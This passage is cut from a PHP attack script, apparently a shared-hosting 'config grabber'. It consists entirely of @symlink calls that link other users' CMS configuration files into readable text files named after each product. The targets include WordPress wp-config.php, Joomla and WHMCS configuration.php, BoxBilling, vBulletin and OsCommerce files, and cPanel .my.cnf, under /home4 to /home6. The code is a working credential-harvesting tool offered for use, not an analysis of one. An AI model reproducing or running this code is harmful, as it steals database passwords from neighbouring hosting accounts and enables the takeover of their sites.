  1671. @symlink('/home4/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1672. @symlink('/home4/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1673. @symlink('/home4/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1674. @symlink('/home4/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1675. @symlink('/home4/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1676. @symlink('/home4/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  1677. @symlink('/home4/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  1678.  
  1679. //home5
  1680.  
  1681. @symlink('/home5/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1682. @symlink('/home5/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1683. @symlink('/home5/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1684. @symlink('/home5/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1685. @symlink('/home5/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1686. @symlink('/home5/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1687. @symlink('/home5/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1688. @symlink('/home5/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1689. @symlink('/home5/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1690. @symlink('/home5/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1691. @symlink('/home5/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1692. @symlink('/home5/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1693. @symlink('/home5/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1694. @symlink('/home5/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1695. @symlink('/home5/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1696. @symlink('/home5/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1697. @symlink('/home5/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1698. @symlink('/home5/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1699. @symlink('/home5/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1700. @symlink('/home5/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1701. @symlink('/home5/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1702. @symlink('/home5/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1703. @symlink('/home5/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1704. @symlink('/home5/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1705. @symlink('/home5/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1706. @symlink('/home5/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1707. @symlink('/home5/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1708. @symlink('/home5/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1709. @symlink('/home5/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1710. @symlink('/home5/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1711. @symlink('/home5/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1712. @symlink('/home5/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1713. @symlink('/home5/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1714. @symlink('/home5/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1715. @symlink('/home5/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1716. @symlink('/home5/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1717. @symlink('/home5/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1718. @symlink('/home5/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1719. @symlink('/home5/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1720. @symlink('/home5/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1721. @symlink('/home5/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1722. @symlink('/home5/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1723. @symlink('/home5/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1724. @symlink('/home5/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1725. @symlink('/home5/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1726. @symlink('/home5/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1727. @symlink('/home5/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1728. @symlink('/home5/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1729. @symlink('/home5/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1730. @symlink('/home5/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1731. @symlink('/home5/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1732. @symlink('/home5/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1733. @symlink('/home5/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1734. @symlink('/home5/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1735. @symlink('/home5/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1736. @symlink('/home5/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1737. @symlink('/home5/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1738. @symlink('/home5/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1739. @symlink('/home5/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1740. @symlink('/home5/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1741. @symlink('/home5/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1742. @symlink('/home5/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1743. @symlink('/home5/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1744. @symlink('/home5/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1745. @symlink('/home5/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1746. @symlink('/home5/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1747. @symlink('/home5/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1748. @symlink('/home5/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1749. @symlink('/home5/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1750. @symlink('/home5/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1751. @symlink('/home5/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1752. @symlink('/home5/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1753. @symlink('/home5/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1754. @symlink('/home5/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1755. @symlink('/home5/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1756. @symlink('/home5/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1757. @symlink('/home5/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1758. @symlink('/home5/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1759. @symlink('/home5/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1760. @symlink('/home5/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1761. @symlink('/home5/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1762. @symlink('/home5/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1763. @symlink('/home5/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1764. @symlink('/home5/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1765. @symlink('/home5/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1766. @symlink('/home5/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1767. @symlink('/home5/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1768. @symlink('/home5/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1769. @symlink('/home5/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1770. @symlink('/home5/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1771. @symlink('/home5/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1772. @symlink('/home5/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1773. @symlink('/home5/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1774. @symlink('/home5/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1775. @symlink('/home5/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1776. @symlink('/home5/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1777. @symlink('/home5/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1778. @symlink('/home5/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1779. @symlink('/home5/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1780. @symlink('/home5/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1781. @symlink('/home5/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1782. @symlink('/home5/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1783. @symlink('/home5/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1784. @symlink('/home5/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1785. @symlink('/home5/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1786. @symlink('/home5/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1787. @symlink('/home5/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1788. @symlink('/home5/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1789. @symlink('/home5/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1790. @symlink('/home5/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1791. @symlink('/home5/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1792. @symlink('/home5/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1793. @symlink('/home5/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1794. @symlink('/home5/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1795. @symlink('/home5/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1796. @symlink('/home5/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1797. @symlink('/home5/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1798. @symlink('/home5/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1799. @symlink('/home5/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1800. @symlink('/home5/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1801. @symlink('/home5/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1802. @symlink('/home5/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1803. @symlink('/home5/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1804. @symlink('/home5/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1805. @symlink('/home5/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1806. @symlink('/home5/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1807. @symlink('/home5/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1808. @symlink('/home5/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1809. @symlink('/home5/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1810. @symlink('/home5/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1811. @symlink('/home5/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1812. @symlink('/home5/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1813. @symlink('/home5/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1814. @symlink('/home5/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1815. @symlink('/home5/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1816. @symlink('/home5/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1817. @symlink('/home5/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1818. @symlink('/home5/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1819. @symlink('/home5/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1820. @symlink('/home5/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1821. @symlink('/home5/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1822. @symlink('/home5/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1823. @symlink('/home5/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1824. @symlink('/home5/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1825. @symlink('/home5/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1826. @symlink('/home5/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1827. @symlink('/home5/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1828. @symlink('/home5/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1829. @symlink('/home5/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1830. @symlink('/home5/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1831. @symlink('/home5/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1832. @symlink('/home5/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1833. @symlink('/home5/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1834. @symlink('/home5/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1835. @symlink('/home5/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1836. @symlink('/home5/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1837. @symlink('/home5/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1838. @symlink('/home5/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1839. @symlink('/home5/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1840. @symlink('/home5/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1841. @symlink('/home5/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1842. @symlink('/home5/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1843. @symlink('/home5/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1844. @symlink('/home5/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1845. @symlink('/home5/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1846. @symlink('/home5/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1847. @symlink('/home5/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1848. @symlink('/home5/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1849. @symlink('/home5/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1850. @symlink('/home5/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1851. @symlink('/home5/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1852. @symlink('/home5/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1853. @symlink('/home5/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1854. @symlink('/home5/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1855. @symlink('/home5/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1856. @symlink('/home5/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1857. @symlink('/home5/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1858. @symlink('/home5/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1859. @symlink('/home5/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1860. @symlink('/home5/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1861. @symlink('/home5/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  1862. @symlink('/home5/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  1863.  
  1864. //home6
  1865.  
  1866. @symlink('/home6/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1867. @symlink('/home6/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1868. @symlink('/home6/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1869. @symlink('/home6/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1870. @symlink('/home6/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1871. @symlink('/home6/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1872. @symlink('/home6/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1873. @symlink('/home6/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1874. @symlink('/home6/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1875. @symlink('/home6/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1876. @symlink('/home6/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1877. @symlink('/home6/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1878. @symlink('/home6/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1879. @symlink('/home6/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1880. @symlink('/home6/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1881. @symlink('/home6/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1882. @symlink('/home6/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1883. @symlink('/home6/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1884. @symlink('/home6/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1885. @symlink('/home6/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1886. @symlink('/home6/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1887. @symlink('/home6/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1888. @symlink('/home6/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1889. @symlink('/home6/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1890. @symlink('/home6/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1891. @symlink('/home6/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1892. @symlink('/home6/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1893. @symlink('/home6/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1894. @symlink('/home6/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1895. @symlink('/home6/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1896. @symlink('/home6/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1897. @symlink('/home6/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1898. @symlink('/home6/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1899. @symlink('/home6/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1900. @symlink('/home6/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1901. @symlink('/home6/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1902. @symlink('/home6/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1903. @symlink('/home6/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1904. @symlink('/home6/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1905. @symlink('/home6/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1906. @symlink('/home6/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1907. @symlink('/home6/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1908. @symlink('/home6/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1909. @symlink('/home6/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1910. @symlink('/home6/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1911. @symlink('/home6/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1912. @symlink('/home6/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1913. @symlink('/home6/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1914. @symlink('/home6/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1915. @symlink('/home6/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1916. @symlink('/home6/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1917. @symlink('/home6/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1918. @symlink('/home6/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1919. @symlink('/home6/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1920. @symlink('/home6/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1921. @symlink('/home6/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1922. @symlink('/home6/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1923. @symlink('/home6/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1924. @symlink('/home6/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1925. @symlink('/home6/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1926. @symlink('/home6/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1927. @symlink('/home6/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1928. @symlink('/home6/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1929. @symlink('/home6/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1930. @symlink('/home6/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1931. @symlink('/home6/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1932. @symlink('/home6/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1933. @symlink('/home6/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1934. @symlink('/home6/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1935. @symlink('/home6/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1936. @symlink('/home6/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1937. @symlink('/home6/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1938. @symlink('/home6/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1939. @symlink('/home6/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1940. @symlink('/home6/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1941. @symlink('/home6/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1942. @symlink('/home6/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1943. @symlink('/home6/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1944. @symlink('/home6/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1945. @symlink('/home6/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1946. @symlink('/home6/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1947. @symlink('/home6/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1948. @symlink('/home6/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1949. @symlink('/home6/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1950. @symlink('/home6/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1951. @symlink('/home6/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1952. @symlink('/home6/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1953. @symlink('/home6/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1954. @symlink('/home6/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1955. @symlink('/home6/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1956. @symlink('/home6/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1957. @symlink('/home6/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1958. @symlink('/home6/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1959. @symlink('/home6/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1960. @symlink('/home6/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1961. @symlink('/home6/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1962. @symlink('/home6/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1963. @symlink('/home6/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1964. @symlink('/home6/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1965. @symlink('/home6/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1966. @symlink('/home6/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1967. @symlink('/home6/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1968. @symlink('/home6/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1969. @symlink('/home6/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1970. @symlink('/home6/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1971. @symlink('/home6/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1972. @symlink('/home6/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1973. @symlink('/home6/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1974. @symlink('/home6/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1975. @symlink('/home6/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1976. @symlink('/home6/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1977. @symlink('/home6/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1978. @symlink('/home6/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1979. @symlink('/home6/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
